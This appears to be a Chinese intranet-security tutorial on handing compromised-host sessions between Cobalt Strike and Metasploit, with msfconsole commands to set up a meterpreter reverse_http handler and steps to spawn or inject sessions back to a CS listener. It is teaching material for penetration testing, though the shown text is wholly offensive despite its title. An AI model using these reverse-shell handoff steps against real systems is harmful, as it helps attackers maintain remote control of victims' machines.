72内网安全-域横向CS&MSF联动及应急响应知识

72内网安全-域横向CS&MSF联动及应急响应知识_第1张图片

拿到才行,拿不到就是多余的

案例一MSF&CobaltStrike 联动 Shell 

有一些功能可能cs或者msf强大一些,他们两个可以相互调用,在真实情况下也是可以cs和msf同时启动的,

cs移交给msf

.创建Foreign监听器

“Listeners”“Add”,“Name”填“msf”(可随便填),“Payload”选“Foreign HTTP”,“HTTP Host(Stager)”填msf的IP地址,“HTTP Port(Stager)”端口自己设定 

72内网安全-域横向CS&MSF联动及应急响应知识_第2张图片

协议不够的时候可以添加插件,

72内网安全-域横向CS&MSF联动及应急响应知识_第3张图片

2.MSF监听模块设置对应地址端口

选择监听模块

    use exploit/multi/handler

设置payload,注意与CS保持一致

    set payload windows/meterpreter/reverse_http

设置地址端口,其中地址可以不设或为0.0.0.0,意为任意地址,或者设为msf的IP地址(与CS保持一致);端口一定要保持一致

    set lhost 0.0.0.0

    set lport 6677

检查设置

    show options

执行

    exploit 

72内网安全-域横向CS&MSF联动及应急响应知识_第4张图片

3.CS执行Spawn选择监听器

选择需要反弹shell的电脑,右键“Spawn”,选择刚才生成的监听器

稍等可在MSF上看见反弹结果,如果没有请检查网络 

72内网安全-域横向CS&MSF联动及应急响应知识_第5张图片

然后选择自己想反弹的主机的shell。

72内网安全-域横向CS&MSF联动及应急响应知识_第6张图片

会话就弹出来了

msf移交给cs

CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线

72内网安全-域横向CS&MSF联动及应急响应知识_第7张图片

我们的目的就是反弹到cs刚刚生成的监听器,我们要返回s4,就是那个5566端口的

进入相关模块,设置对应的东西,ip,端口,s4等等

72内网安全-域横向CS&MSF联动及应急响应知识_第8张图片

ip设置为刚刚cs的ip监听的端口就可以了,运行,cs等待上线

72内网安全-域横向CS&MSF联动及应急响应知识_第9张图片

就完成了上线

ping

an

你可能感兴趣的:(安全)